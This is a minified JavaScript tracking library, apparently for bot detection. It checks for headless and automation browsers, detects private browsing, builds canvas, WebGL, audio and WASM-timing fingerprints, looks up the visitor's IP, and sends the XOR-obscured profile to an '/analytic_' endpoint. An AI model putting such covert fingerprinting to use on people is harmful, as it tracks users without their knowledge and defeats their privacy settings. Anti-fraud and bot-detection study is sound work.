function ya(a){const b=Object.keys(a.F).map(d=>({h:d,O:(a.F[d]??null).O,result:(a.F[d]??null).ca[2]}));var c=b.filter(function(d){return d.result!=="inconclusive"});const e=b.filter(function(d){return d.result==="headless"});c=c.length>0?(e.length/c.length*100).toFixed(2):"0.00";return{isHeadless:c>=25,results:b,confidence:c}}class G{constructor(){this.F={};this.da=!1}}
var F=null,wa=[{displayName:"User Agent Analysis",h:"user-agent-test",i:function(){const a=navigator.userAgent,b=/headless/i.test(a);return["User agent: "+a,b?1:0]}},{displayName:"Application Version Check",h:"app-version-test",i:function(){const a=navigator.appVersion,b=/headless/i.test(a);return["Application version: "+a,b?1:0]}},{displayName:"Plugin Detection",h:"plugins-test",i:function(){const a=navigator.plugins.length;return["Detected "+a+" browser plugins",a===0?-1:0]}},{displayName:"Plugin Prototype Validation",
h:"plugin-proto-test",i:function(){const a=navigator.plugins;let b=PluginArray.prototype===a.__proto__;a.length>0&&(b=b&&Plugin.prototype===a[0].__proto__);return["Plugin prototype validation: "+(b?"valid":"invalid"),b?0:1]}},{displayName:"MIME Type Detection",h:"mime-test",i:function(){const a=navigator.mimeTypes.length;return["Detected "+a+" MIME types",a===0?-1:0]}},{displayName:"MIME Type Prototype Validation",h:"mime-proto-test",i:ra},{displayName:"Language Configuration",h:"languages-test",
i:sa},{displayName:"MIME Prototype Validation",h:"mime-proto-test",i:ra},{displayName:"Language Configuration",h:"languages-test",i:sa},{displayName:"WebDriver Detection",h:"webdriver-test",i:function(){const a=!!navigator.webdriver;return["WebDriver property: "+(a?"present":"absent"),a?1:-1]}},{displayName:"Chrome DevTools Protocol",h:"devtools-protocol-test",i:function(){function a(){return!!(window.stackAccessCount&&window.stackAccessCount>0)}return new Promise(function(b){try{let e=0;var c=Error();
Object.defineProperty(c,"stack",{get:function(){e++;return"fake stack trace"}});console.log(c);window.stackAccessCount=e;const d=a();b(["DevTools Protocol stack manipulation test",d?1:-1])}catch(e){c=a(),b(["DevTools Protocol detection with exception handling",c?1:-1])}})}},{displayName:"PhantomJS Detection",h:"phantom-test",i:function(){const a=window,b=navigator;if(a._nightmare)return["Nightmare.js framework detected",1];if(a.callPhantom||a.phantom||a._phantom)return["PhantomJS runtime environment detected",
1];const c=b.userAgent;return c.includes("HeadlessChrome")||c.includes("PhantomJS")?["Headless browser identified in user agent: "+c,1]:a.chrome&&a.chrome.runtime||!c.includes("Chrome")?b.webdriver===!0?["WebDriver flag is set to true",1]:["PhantomJS and headless browser analysis complete",-1]:["Chrome browser without runtime detected",1]}},{displayName:"Selenium Detection",h:"selenium-test",i:function(){var a=window;const b=document;a=["webdriver"in a,"_Selenium_IDE_Recorder"in a,"callSelenium"in
a,"_selenium"in a,"__webdriver_script_fn"in b,"__driver_evaluate"in b,"__webdriver_evaluate"in b,"__selenium_evaluate"in b,"__fxdriver_evaluate"in b,"__driver_unwrapped"in b,"__webdriver_unwrapped"in b,"__selenium_unwrapped"in b,"__fxdriver_unwrapped"in b,"__webdriver_script_func"in b,b.documentElement.getAttribute("selenium")!==null,b.documentElement.getAttribute("webdriver")!==null,b.documentElement.getAttribute("driver")!==null].filter(function(c){return c===!0});return["Found "+a.length+" Selenium indicators",
a.length>0?1:-1]}},{displayName:"Playwright Detection",h:"playwright-test",i:function(){if(window.__playwright__binding__)return["Playwright binding detected in window object",1];if(window.__pwInitScripts)return["Playwright initialization scripts found",1];var a=0;for(var b in window){const c=window[b];typeof c==="function"&&typeof c.__installed==="boolean"&&a++}if(a>0)return["Found "+a+" Playwright-instrumented functions",1];a=0;for(const c in window)b=window[c],typeof b==="function"&&b.toString().indexOf("new Error(`exposeBindingHandle supports a single argument")>
-1&&a++;return["Playwright framework analysis complete",a>0?1:-1]}},{displayName:"Headless Flag Detection",h:"headless-flag-test",i:function(){const a=navigator;if(!a.userAgent.toLowerCase().includes("chrome"))return["Non-Chrome browser detected, skipping headless flag test",-1];let b=!1;a.userAgent&&a.userAgent.toLowerCase().includes("headless")&&(b=!0);if(a.userAgentData&&a.userAgentData.brands){const c=a.userAgentData.brands;for(let e=0;e<c.length;e++){const d=c[e];if(d.brand&&d.brand.toLowerCase().includes("headless")){b=
!0;break}}try{a.userAgentData.getHighEntropyValues(["brands","fullVersionList"])}catch(e){}}return["Headless flag detection in user agent data",b?1:-1]}},{displayName:"Chrome Runtime Check",h:"chrome-runtime-test",i:function(){const a=window.ja,b=eval.toString().length;return["Chrome object: "+(a?"present":"missing")+", eval length: "+b,b!==33||a?0:1]}},{displayName:"Permission Inconsistencies",h:"permission-test",i:function(){return navigator.permissions&&window.Notification?navigator.permissions.query({name:"notifications"}).then(function(a){const b=
window.Notification.permission;return["Notification permission: "+b+", permission query: "+a.state,b==="denied"&&a.state==="prompt"?1:0]}).catch(function(a){return["Permission query error: "+a.message,-1]}):Promise.resolve(["Permission API unavailable",-1])}},{displayName:"Notification Permission Anomalies",h:"notification-test",i:function(){return new Promise(function(a){navigator.permissions&&window.Notification?navigator.permissions.query({name:"notifications"}).then(function(b){const c=window.Notification.permission;
a(["Notification permission state: "+c+", query state: "+b.state,c==="denied"&&b.state==="prompt"?1:-1])}).catch(function(){a(["Notification permission query failed",-1])}):a(["Notification APIs not available",-1])})}},{displayName:"Developer Tools Detection",h:"devtools-test",i:function(){const a=/./;let b=0;const c=a.toString;a.toString=function(){b++;return"modified_regex"};console.debug(a);a.toString=c;return["Developer tools detection (toString calls: "+b+")",b>1?-1:0]}},{displayName:"Image Rendering Test",
h:"image-render-test",i:function(){return new Promise(function(a){const b=document.createElement("img");b.id="headless-detection-image";b.style.cssText="visibility:hidden;position:absolute;top:-1000px;left:-1000px;";b.src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7";b.onload=function(){const c=document.getElementById("headless-detection-image"),e=!(!c||c.offsetWidth!==1||c.readyState!=="complete"&&c.readyState!==void 0);c&&c.parentNode&&c.parentNode.removeChild(c);
a(["Image rendering test completed",e?0:1])};b.onerror=function(){a(["Image loading failed",1])};setTimeout(()=>{b.parentNode||a(["Image not appended to DOM",1])},1E3);setTimeout(()=>{console.log("document.body");if(document.body)console.log("body found, appending image"),document.body.appendChild(b);else{const c=document.querySelector("body");console.log("missing body, trying to find",c);c&&c.appendChild(b)}},0)})}},{displayName:"Window Dimensions Check",h:"dimensions-test",i:function(){const a=
window.outerHeight,b=window.outerWidth;return["Outer: "+b+"x"+a+", Inner: "+window.innerWidth+"x"+window.innerHeight,a===0&&b===0?1:0]}},{displayName:"Popup Creation Test",h:"popup-test",i:function(){try{const a=window.open("","","width=1,height=1");return a!==null&&a!==void 0?(a.close(),["Popup window creation successful",0]):["Popup window creation blocked or failed",1]}catch(a){return["Exception during popup creation: "+a.message,1]}}}];
typeof module!=="undefined"&&module.exports?module.exports=G:typeof window!=="undefined"&&(window.BrowserDetector=G,window.BrowserDetector.getInstance=ta,window.BrowserDetector.performQuickDetection=ua);async function za(a){await Aa(a);console.log("_feid",H.B);if(Ba())return a.C="Safari",await Ca(a);if(Da()){var b=navigator.userAgent;b=b.match(/Chrome/)?navigator.ha!==void 0?"Brave":b.match(/Edg/)?"Edge":b.match(/OPR/)?"Opera":"Chrome":"Chromium";a.C=b;self.Promise!==void 0&&self.Promise.allSettled!==void 0?Ea(a):Fa(a)}else{if(Ga())return a.C="Firefox",await Ha(a);if(Ia())return a.C="Internet Explorer",await I(a,window.indexedDB===void 0);a.H(Error("detectIncognito cannot determine the browser"))}}
function I(a,b){if(!a.K)return a.K=!0,a.J({isPrivate:b,browserName:a.C})}function Ba(){return H.B===44||H.B===43}function Da(){return H.B===51}function Ga(){return H.B===25}function Ia(){return navigator.msSaveBlob!==void 0}async function Ja(a){try{await navigator.storage.getDirectory(),I(a,!1)}catch(b){const c=(b instanceof Error&&typeof b.message==="string"?b.message:String(b)).includes("unknown transient reason");I(a,c)}}
function Ka(a){const b=String(Math.random());try{const c=indexedDB.open(b,1);c.onupgradeneeded=e=>{e=e.target.result;try{e.createObjectStore("t",{autoIncrement:!0}).put(new Blob),I(a,!1)}catch(d){(d instanceof Error&&typeof d.message==="string"?d.message:String(d)).includes("are not yet supported")?I(a,!0):I(a,!1)}finally{e.close(),indexedDB.deleteDatabase(b)}};c.onerror=()=>I(a,!1)}catch{I(a,!1)}}
async function Ca(a){if(navigator.storage&&typeof navigator.storage.getDirectory==="function")await Ja(a);else if(navigator.maxTouchPoints!==void 0)Ka(a);else a:{const b=window.openDatabase,c=window.localStorage;try{b(null,null,null,null)}catch(e){I(a,!0);break a}try{c.setItem("test","1"),c.removeItem("test")}catch(e){I(a,!0);break a}I(a,!1)}}
function Ea(a){navigator.webkitTemporaryStorage&&typeof navigator.webkitTemporaryStorage.queryUsageAndQuota==="function"&&navigator.webkitTemporaryStorage.queryUsageAndQuota((b,c)=>{b=(b=window)&&b.performance&&b.performance.memory;I(a,Math.round(c/1048576)<Math.round((b&&b.jsHeapSizeLimit?b.jsHeapSizeLimit:1073741824)/1048576)*2)},b=>{a.H(Error("detectIncognito somehow failed to query storage quota: "+b.message))})}
function Fa(a){const b=window.webkitRequestFileSystem;b(0,1,()=>{I(a,!1)},()=>{I(a,!0)})}async function Ha(a){if(navigator.storage&&typeof navigator.storage.getDirectory==="function")try{await navigator.storage.getDirectory();I(a,!1);return}catch(b){const c=(b instanceof Error&&typeof b.message==="string"?b.message:String(b)).includes("Security error");I(a,c);return}I(a,navigator.serviceWorker===void 0)}
async function Aa(a){if(navigator.storage&&typeof navigator.storage.estimate==="function"){const {quota:b}=await navigator.storage.estimate();if(b<12E7)return console.log("Possibly in private mode due to low storage quota."),I(a,!0),!0}return!1}
class H{constructor(){this.C="Unknown";this.K=!1;this.H=this.J=null}async L(){return await new Promise((a,b)=>{this.J=a;this.H=b;za(this).catch(b)})}static get B(){let a=0;try{(-1).toFixed(-1)}catch(b){a=b&&b.message?b.message.length:String(b).length}return a}}async function La(){return await (new H).L()}typeof module!=="undefined"&&module.exports?module.exports=H:typeof window!=="undefined"&&(window.DetectIncognito=H,H.run=La,H.prototype.detect=H.prototype.L);function Ma(a,b,c){function e(k){this.A=k%n;this.A<=0&&(this.A+=n)}function d(k,p,m){k=(k-1)/n;return m?k*p:Math.floor(k*p)}function f(k,p,m){m=p.createRadialGradient(d(k.g(),m.width),d(k.g(),m.height),d(k.g(),m.width),d(k.g(),m.width),d(k.g(),m.height),d(k.g(),m.width));m.addColorStop(0,y[d(k.g(),y.length)]);m.addColorStop(1,y[d(k.g(),y.length)]);p.fillStyle=m}const g=c.area,n=c.offsetParameter,q=c.multiplier,h=c.fontSizeFactor;c=c.maxShadowBlur;const x=window.Crypto;e.prototype.g=function(){return this.A=
q*this.A%n};if(!window.CanvasRenderingContext2D)return"unknown";const y=function(){return x.Base64.decode("MTY3Mzc4NDN8MTY3NTc2NTd8MTY3MjQ5OTF8MTY3NzcxMTN8NDYwNTR8MTUxMTkxNTV8MzM2ODY3OHwxMDA2NjI3OHwxMDA5MjQ0MXwxMTc1MDczM3w4NDM0NDMyfDg0Mjc3NzZ8MTUxMTkyODN8NjcxNzYxOXw2NzIzODY2fDE2NzUxMDc4fDEzNDM0NjUwfDE2NzE4NDM4fDE1MDg2MzYyfDM0MDc4MjB8NjcyMzkxN3wxMTc1NzI2MHw1MDc5MDQwfDExNzQ0MDAwfDEzNDAyMzE2fDY3MTA4NjF8MTAwMzM5MTl8MTUwOTk2NDd8NTA5MjM1MXwxNzQ5OTEzfDE1MDk5NTcxfDMzODE1MzB8MTM0MDg2NjV8MTE3NzY3OTR8NTkwMDh8NTA3OTE0Mnw4NDI3OTA0fDE1MTM4Njg4fDE3NjkyNjd8MTAwNjYyMjd8MTY3MjQ4NjR8MTM0MjE1Njh8Njc0MzYyOXw1MDc5MjQ0fDEwMDI3MTg3fDE1MDkzMDk0fDUwOTIyMjR8MTY3MzE0Njl8MTAwODYxMTh8NjcxMTAzOQ==").split("|").map(function(k){return parseInt(k,
10).toString(16)}).map(function(k){return"#"+Array(7-k.length).join("0")+k})}(),w=[function(k,p,m){p.beginPath();p.arc(d(k.g(),m.width),d(k.g(),m.height),d(k.g(),Math.min(m.width,m.height)),d(k.g(),Math.PI*2,!0),d(k.g(),Math.PI*2,!0));p.stroke()},function(k,p,m){const L=Math.max(1,d(k.g(),5));let la="";for(let ma=0;ma<L;ma++){const Xa=65+k.g()%61;la+=String.fromCharCode(Xa)}p.font=m.height/h+"px aafakefontaa";p.strokeText(la,d(k.g(),m.width),d(k.g(),m.height),d(k.g(),m.width))},function(k,p,m){p.beginPath();
p.moveTo(d(k.g(),m.width),d(k.g(),m.height));p.bezierCurveTo(d(k.g(),m.width),d(k.g(),m.height),d(k.g(),m.width),d(k.g(),m.height),d(k.g(),m.width),d(k.g(),m.height));p.stroke()},function(k,p,m){p.beginPath();p.moveTo(d(k.g(),m.width),d(k.g(),m.height));p.quadraticCurveTo(d(k.g(),m.width),d(k.g(),m.height),d(k.g(),m.width),d(k.g(),m.height));p.stroke()},function(k,p,m){p.beginPath();p.ellipse(d(k.g(),m.width),d(k.g(),m.height),d(k.g(),Math.floor(m.width/2)),d(k.g(),Math.floor(m.height/2)),d(k.g(),
Math.PI*2,!0),d(k.g(),Math.PI*2,!0),d(k.g(),Math.PI*2,!0));p.stroke()}];try{const k=new e(b),p=document.createElement("canvas");p.width=g.width;p.height=g.height;p.style.display="none";const m=p.getContext("2d");for(let L=0;L<a;L++)f(k,m,g),m.shadowBlur=d(k.g(),c),m.shadowColor=y[d(k.g(),y.length)],(0,w[d(k.g(),w.length)])(k,m,g),m.fill();return x.x64Hash128(p.toDataURL(),b)}catch(k){console.error(k)}}
function Na(){return(new J(100,42,{area:{width:512,height:512},offsetParameter:2001000001,fontSizeFactor:1.5,multiplier:15E3,maxShadowBlur:50})).hash}class J{get hash(){return Ma(this.R,this.S,this.options)}constructor(a,b,c){this.R=a;this.S=b;this.options=c}}typeof module!=="undefined"&&module.exports?module.exports=J:typeof window!=="undefined"&&(window.PicassoCanvas=J,J.hash=Na);function Oa(a){a||(a=document.createElement("canvas"));try{const b=a.getContext("webgl")||a.getContext("experimental-webgl");if(!b)return null;const c=b.getExtension("WEBGL_debug_renderer_info");return{vendor:c?b.getParameter(c.UNMASKED_VENDOR_WEBGL):null,renderer:c?b.getParameter(c.UNMASKED_RENDERER_WEBGL):null,version:b.getParameter(b.VERSION),shadingLanguageVersion:b.getParameter(b.SHADING_LANGUAGE_VERSION)}}catch(b){return{vendor:null,renderer:null}}}
function Pa(a){let b,c,e,d;try{a||(a=document.createElement("canvas")),a.width=256,a.height=256,d=a.getContext("webgl2",{preserveDrawingBuffer:!0})||a.getContext("experimental-webgl2",{preserveDrawingBuffer:!0})||a.getContext("moz-webgl2",{preserveDrawingBuffer:!0})||a.getContext("webgl",{preserveDrawingBuffer:!0})||a.getContext("experimental-webgl",{preserveDrawingBuffer:!0})||a.getContext("moz-webgl",{preserveDrawingBuffer:!0})}catch(f){}try{if(null==d||null==d.getParameter(d.VERSION))throw Error("0");
}catch(f){return 0}try{b=d.getExtension("WEBGL_debug_renderer_info"),c=d.getParameter(b.UNMASKED_VENDOR_WEBGL),e=d.getParameter(b.UNMASKED_RENDERER_WEBGL)}catch(f){e=c=null}try{const f=d.createBuffer();d.bindBuffer(d.ARRAY_BUFFER,f);const g=new Float32Array([-.2,-.9,0,.4,-.26,0,0,.7321,0]);d.bufferData(d.ARRAY_BUFFER,g,d.STATIC_DRAW);f.Y=3;f.Z=3;const n=d.createProgram(),q=d.createShader(d.VERTEX_SHADER);d.shaderSource(q,"attribute vec2 attrVertex;varying vec2 varyinTexCoordinate;uniform vec2 uniformOffset;void main(){varyinTexCoordinate=attrVertex+uniformOffset;gl_Position=vec4(attrVertex,0,1);}");
d.compileShader(q);const h=d.createShader(d.FRAGMENT_SHADER);d.shaderSource(h,"precision mediump float;varying vec2 varyinTexCoordinate;void main() {gl_FragColor=vec4(varyinTexCoordinate,0,1);}");d.compileShader(h);d.attachShader(n,q);d.attachShader(n,h);d.linkProgram(n);d.useProgram(n);n.ga=d.getAttribLocation(n,"attrVertex");n.$=d.getUniformLocation(n,"uniformOffset");d.enableVertexAttribArray(n.sa);d.vertexAttribPointer(n.ga,f.Y,d.FLOAT,!1,0,0);d.uniform2f(n.$,1,1);d.drawArrays(d.TRIANGLE_STRIP,
0,f.Z)}catch(f){}a="";try{const f=new Uint8Array(262144);d.readPixels(0,0,256,256,d.RGBA,d.UNSIGNED_BYTE,f);const g=JSON.stringify(f).replace(/,?"[0-9]+":/g,"");if(""===g.replace(/^{[0]+}$/g,""))throw Error("1");a=K(g)}catch(f){a=0}return{hash:a,sha256:ea(a),renderer:e,vendor:c}}class M{static get fingerprint(){return Pa().hash}}
async function Qa(a){return await new Promise(b=>{try{const c=new Image;a||(a=document.createElement("canvas"));const e=a.getContext("2d");c.onload=()=>{e.drawImage(c,0,0);b(e.getImageData(0,0,1,1).data)};c.onerror=()=>{b(null)};c.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAC0lEQVQYV2NgAAIAAAUAAarVyFEAAAAASUVORK5CYII="}catch(c){b(null)}})}async function Ra(a){try{const b=JSON.stringify(await Qa(a));return await Sa(b)}catch(b){return null}}
class N{static get fingerprint(){try{var a=JSON,b=a.stringify;var c;try{c||(c=document.createElement("canvas"));const f=c.getContext("2d");f.textBaseline="top";f.font="14px Arial";f.fillText("PunchCloak Canvas Fingerprint",2,2);f.fillStyle="rgba(102, 204, 0, 0.7)";f.fillRect(100,5,80,20);f.textBaseline="top";f.font="14px 'Arial'";f.fillStyle="#f60";f.fillRect(0,0,200,50);f.fillStyle="#069";f.fillText("device-fingerprint",10,10);var e=c.toDataURL()}catch(f){e=null}const d=b.call(a,e);return K(d)}catch(d){return null}}}
function Ta(){return new Promise(a=>{let b,c,e,d;if(!window.OfflineAudioContext&&!window.webkitOfflineAudioContext)return a(null);try{b=new (window.OfflineAudioContext||window.webkitOfflineAudioContext)(1,44100,44100);d=b.createOscillator();d.type="triangle";d.frequency.value=1E4;e=b.createDynamicsCompressor();e.threshold&&(e.threshold.value=-50);e.knee&&(e.knee.value=40);e.ratio&&(e.ratio.value=12);e.reduction&&(e.reduction.value=-20);e.attack&&(e.attack.value=0);e.release&&(e.release.value=.25);
d.connect(e);e.connect(b.destination);d.start(0);b.startRendering();const f=setTimeout(()=>{console.warn("Timed out");b.oncomplete=function(){a(null)};return b=null},1E3);b.oncomplete=g=>{clearTimeout(f);c=0;for(let n=4500;n<5E3;n++)c+=Math.abs(g.renderedBuffer.getChannelData(0)[n]);c=c.toString();e.disconnect();a(K(c))}}catch(f){a(null),c=0}})}class O{static get fingerprint(){return Ta()}}
async function P(a){if(Q.has(a))return Q.get(a);if(a<=1n)return 1n;const b=await P(BigInt(a)-1n)+await P(BigInt(a)-2n);Q.set(a,b);return b}async function R(a){return a<=1?1:await R(a-1)+await R(a-2)}async function Ua(){try{const a=+new Date;for(let b=0;b<99999990;b++);return+(+new Date-a).toFixed(0)}catch(a){return null}}
async function Va(){return await new Promise(a=>{const b=Uint8Array.from(window.Crypto.Base64.decode("AGFzbQEAAAABCAFgA39/fwF/AwIBAAUDAQABBxcCBm1lbW9yeQIACnByaW1lUHJvYmUAAAoXARUBAn8DQCAEQQFqIgQgAkgNAAtBKgs="),c=>c.charCodeAt(0));WebAssembly.instantiate(b).then(({instance:c})=>{const e=performance.now();let d=0;for(let f=0;f<10;f++)d+=c.exports.primeProbe(0,1,199999991);c=(performance.now()-e).toFixed(4);console.log("Prime+Probe result:",d,`${c}`);a(c+d)})})}class S{}var Q=new Map;
async function Wa(){try{const c=+new Date;for(var a=0;a<1E3;a++)var b=await window.WasmFingerprints.ka(13n);console.log(`Fibonacci "${a}" benchmark time: ${+(+new Date-c).toFixed(0)} | result: ${b}`)}catch(c){return null}}async function Ya(){try{const c=+new Date;for(var a=0;a<1E3;a++)var b=await window.WasmFingerprints.la(13);console.log(`Fibonacci "${a}" benchmark time: ${+(+new Date-c).toFixed(0)} | result: ${b}`)}catch(c){return null}}
async function Za(){try{const a=+new Date;for(let b=0;b<1E5;b++)await K((b+"benchmarkCryptoMd5"+Array(1E4).fill("-")+b).toString());return+(+new Date-a).toFixed(0)}catch(a){return null}}async function $a(){try{const a=+new Date;for(let b=0;b<1E5;b++)await Sa((b+"benchmarkCryptoMd5"+Array(1E4).fill("-")+b).toString());return+(+new Date-a).toFixed(0)}catch(a){return null}}class T{}class U{}
typeof module!=="undefined"&&module.exports?module.exports=U:(window.Fingerprints=U,U.wasm=S,U.webgl=M,U.canvas=N,window.WasmFingerprints=S,S.fast_fibonacci=P,S.fibonacci=R,S.benchmarkWasm=Ua,S.wasmTest=Va,window.WebGLFingerprints=M,M.fingerprintData=Pa,M.getWebGLInfo=Oa,window.CanvasFingerprints=N,N.tpCanvasFingerprint=Ra,N.tpCanvasData=Qa,window.AudioFingerprints=O,O.fingerprint=O.fingerprint,O.createAudioContextWithCompressor=Ta,window.Benchmarks=T,T.benchmarkCryptoMd5=Za,T.benchmarkFastFibonacci=
Wa,T.benchmarkFibonacci=Ya,T.benchmarkCryptoSha256=$a);async function V(a){const {W:b=!0,X:c=!0,U:e=!0,V:d=!0}=a;console.log(`getFingerprintData - getWasm: ${b}, getWebgl: ${c}, getAudio: ${e}, getCanvas: ${d}`);a={wasm:{},webgl:{}};var f=window.Fingerprints,g=f.wasm;const n=f.webgl;var q=f.canvas;f=f.audio;if(b&&g){console.log("WASM - enabled");var h=await g.wasmTest();g=await g.benchmarkWasm();h&&(a.wasm.test=h);g&&(a.wasm.bench=g)}c&&n&&(console.log("WEBGL - enabled"),g=n.getWebGLInfo(),h=await n.fingerprint,g&&(a.webgl.info=g),h&&(a.webgl.hash=h));
e&&f&&(console.log("audioFP - enabled"),(f=f.fingerprint)&&(a.audio=f));d&&q&&(console.log("canvasFP - enabled"),(q=await q.fingerprint)&&(a.canvas=q));q=ab(a);q=await K(q);console.log(`hash: ${q}`);return{fingerprint:q,device_fingerprint:n.fingerprint||n.fingerprintData().hash,device_sha256:n.fingerprintData().qa,...a}}async function bb(a){try{a=a||await V();const b=ab(a);return K(b)}catch(b){return console.error(b),null}}
class W{constructor(){this.u={};this.G=null;this.u=V();this.G=this.u.fingerprint}get data(){return this.u}get fingerprint(){return this.G}static get fingerprint(){return this.G}}var K=window.Crypto.md5||(()=>null),Sa=window.Crypto.sha256||(()=>null),ab=window.Utils.stableStringify||(()=>null);typeof module!=="undefined"&&module.exports?module.exports=W:(window.DeviceFingerprint=W,W.getFingerprintHash=bb,W.getFingerprintData=V);const cb=async a=>await (await fetch(a,{mode:"cors"})).text(),db=async()=>await cb("https://checkip.amazonaws.com/"),eb=async()=>{const a=(await cb("https://www.cloudflare.com/cdn-cgi/trace")).split("\n").map(b=>b.split("="));return Object.fromEntries(new Map(a)).ip.replace("\\n","\n").trim()};async function fb(){return await (new X).info()}
async function gb(){return await new Promise(a=>{window.ondevicemotion=b=>{if(b.accelerationIncludingGravity.x!==null)return a(!0)};setTimeout(()=>a(!1),300)})}
class X{constructor(){var a=window.navigator.userAgent,b="Unknown OS";a.indexOf("Win")!==-1?b="Windows":a.indexOf("Mac")!==-1?b="Mac OS":a.indexOf("Linux")!==-1?b="Linux":a.indexOf("Android")!==-1?b="Android":a.indexOf("like Mac")===-1||a.indexOf("iPhone")===-1&&a.indexOf("iPad")===-1&&a.indexOf("iPod")===-1||(b="iOS");this.M=b||navigator.platform||"?";this.D={name:"Unknown",version:"?"};this.languages=navigator.languages||[];this.aa=`${window.screen.width}x${window.screen.height}`;a=navigator.userAgent||
navigator.userAgent||"";b={name:"Unknown",version:"?"};if(/Edg\/([0-9.]+)/.test(a))b.name="Edge",b.version=RegExp.$1;else if(/OPR\/([0-9.]+)/.test(a))b.name="Opera",b.version=RegExp.$1;else if(/Chrome\/([0-9.]+)/.test(a)&&/Safari\//.test(a))b.name="Chrome",b.version=RegExp.$1;else if(/Version\/([0-9.]+).*Safari\//.test(a))b.name="Safari",b.version=RegExp.$1;else if(/Firefox\/([0-9.]+)/.test(a))b.name="Firefox",b.version=RegExp.$1;else if(/MSIE\s([0-9.]+)/.test(a)||/Trident\/.*rv:([0-9.]+)/.test(a))b.name=
"IE",b.version=RegExp.$1;const {name:c,version:e}=b;this.D.name=c;this.D.version=e}get data(){return{os:this.M,timezone_offset:(new Date).getTimezoneOffset(),locale:Intl.DateTimeFormat().resolvedOptions().locale,screen:{width:screen.width,height:screen.height,colorDepth:screen.colorDepth,pixelDepth:screen.pixelDepth},timezone:Intl.DateTimeFormat().resolvedOptions().timeZone,touch_support:navigator.maxTouchPoints||0,hardware_concurrency:navigator.hardwareConcurrency,device_memory:navigator.deviceMemory,
cookie_enabled:navigator.cookieEnabled,do_not_track:navigator.doNotTrack,platform:navigator.platform,user_agent:navigator.userAgent,language:navigator.language}}async info(){let a={};try{a=await window.BrowserDetector.performQuickDetection(),console.log("Headless result:",a)}catch(c){console.log("Headless detection failed:",c)}let b;try{b=await window.DetectIncognito.run()}catch(c){console.log("Incognito detection failed:",c),b=null}return{os:this.M,browser_name:this.D.name,browser_version:this.D.version,
languages:this.languages,screen_info:this.aa,accelerometer:await gb(),is_headless:a.isHeadless??null,in_incognito:b.isPrivate??null,...this.data}}}var hb=l(()=>new Promise((a,b)=>eb().then(a).catch(c=>{console.log(c);db().then(a).catch(b)})));typeof module!=="undefined"&&module.exports?module.exports=X:typeof window!=="undefined"&&(window.SystemInfo=X,X.getInfo=fb,X.prototype.info=X.prototype.info,X.detectIP=hb);function ib(a,b,c=null){Y||(Y=new Z(a,b,c));return Y}function jb(a,b,c){return typeof a!=="string"?a:a.split(b).join(c)}
class Z{ba(a){this.config={...this.config,...a};return this}get j(){return this.config.workflowId}set j(a){return this.config.workflowId=a}get l(){return this.config.workflowToken}set l(a){return this.config.workflowToken=a}constructor(a,b,c=null){this.config={getWasm:!0,getWebgl:!0,getAudio:!0,getCanvas:!0,ia:1,debug:window.DEBUG||!1};this.m={webdriver_detected:!1,automation_detected:!1,plugins_data:Array.from(navigator.plugins).map(e=>e.name)};if(!a||!b)throw Error("Missing one or more  required arguments! Exiting.");
typeof window!=="undefined"&&window.DEBUG&&kb&&console.log("BrowserDetector",kb);typeof window!=="undefined"&&window.DEBUG&&lb&&console.log("detectIncognito",lb);this.j=a;this.l=b;this.config=c?{...this.config,...c,j:a,l:b}:{...this.config,j:a,l:b};this.m={webdriver_detected:!1,automation_detected:!1};navigator.webdriver&&(this.m.webdriver_detected=!0)}init(){setTimeout(async()=>await this.N(),0)}async u(){console.log(`_data | workflowId: ${this.j} ; workflowToken: ${this.l}`);var a=this.config.getWasm,
b=this.config.getWebgl;const c=this.config.getAudio,e=this.config.getCanvas;console.log(`_data - getWasm: ${a}, getWebgl: ${b}, getAudio: ${c}, getCanvas: ${e}`);a=await mb.getFingerprintData({W:a,X:b,U:c,V:e});console.log("fingerprint",a);b=await nb.getInfo();this.m.headless_detected=b.isHeadless;return{...b,ip_address:await nb.detectIP(),fingerprint_data:a,device_fingerprint:a.device_fingerprint,webdriver_detected:this.m.webdriver_detected,automation_detected:this.m.automation_detected,plugins_data:this.m.plugins_data}}async I(a=
{}){console.log("prepareData - start, workflowId:",this.config.workflowId,this.j,this.config);console.log("prepareData - start, workflowToken:",this.config.l,this.l);a={...a,...(await this.u())};const b=Z.safeReplaceAll(Z.Base64.encode(`#${this.j}`),"=","");console.log("Debug key:",b);console.log("Debug data:",a);return D(ob.stableStringify(a),b)}async N(a=!1){try{const c=await this.I(),e={method:"POST",headers:{"Content-Type":"application/json","X-Workflow-Id":this.j,"X-Workflow-Token":this.l},body:c},
d=jb(Z.Base64.encode(`#${this.j}`),"=","");if(a){const f=new XMLHttpRequest;f.open("POST",`/analytic_${d}`,!1);f.setRequestHeader("Content-Type","application/json");f.setRequestHeader("X-Workflow-Token",this.l);f.send(c)}else{var b=await fetch(`/analytic_${d}`,e);if(b.status!==200)throw Error(`HTTP error! status: ${b.status}`);console.log("response",b);if(b.ok)return window.Utils.isJsonResponse(b)?await b.json():await b.text()}}catch(c){console.error("Error submitting JS data:",c)}}async getStats(){return{...(await this.u()),
...this.m}}}var Y,pb=window.Crypto.Base64,lb=window.DetectIncognito,kb=window.BrowserDetector,mb=window.DeviceFingerprint,ob=window.Utils,nb=window.SystemInfo;
typeof module!=="undefined"&&module.exports?module.exports=Z:(window.Tracker=Z,Z.getInstance=ib,Z.Base64=pb,Z.safeReplaceAll=jb,Z.prototype.getStats=Z.prototype.getStats,Z.prototype.submitData=Z.prototype.N,Z.prototype.setConfig=Z.prototype.ba,Z.prototype.prepareData=Z.prototype.I,window.DEBUG&&(Z.prototype.prepareData=Z.prototype.I,Z.prototype.xorStringWithKey=D,Z.prototype.debug=async function(){const a=this;return await new Promise(async b=>{a.d={};console.log(`Debug info for ${this.j}:`,await this.getStats());
console.log("this.config",this.config);console.log(`${this.config.workflowId} ${this.config.workflowToken}`);const c=await this.prepareData();console.log("Debug data (xor):",c);console.log("workflowId:",this.j,a.j,this.workflowId,this.config?.j);const e=jb(Z.Base64.encode(`#${this.j}`),"=","");console.log("Debug key:",e);const d=D(c,e);console.log("Debug data (raw):",d);a.d.key=e;a.d.xoredData=c;a.d.rawData=d;a.d.data=JSON.parse(d);b(a.d);console.log(a,a.d);return a.d})}));}).call(this);
